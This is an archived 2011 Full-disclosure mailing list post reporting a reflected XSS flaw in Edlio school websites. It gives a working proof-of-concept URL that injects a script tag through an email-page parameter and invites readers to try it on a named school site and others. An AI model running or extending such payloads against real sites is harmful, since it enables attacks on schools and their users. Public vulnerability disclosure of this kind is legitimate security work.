[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] XSS attack on Edlio.com school websites
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] XSS attack on Edlio.com school websites
- From: Nate Theis <nttheis@xxxxxxxxx>
- Date: Wed, 23 Nov 2011 14:49:03 -0800
http://{SITE_GOES_HERE}/apps/email/index.jsp?e=239323752379240323772273237523772383237723832309238123792273238724032417&n=<script>alert("XSS");</script><full-disclosure@xxxxxxxxxxxxxxxxx>
for SITE_GOES_HERE, try: www.artshigh.org, or any site at
http://www.edlio.com/portfolio/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/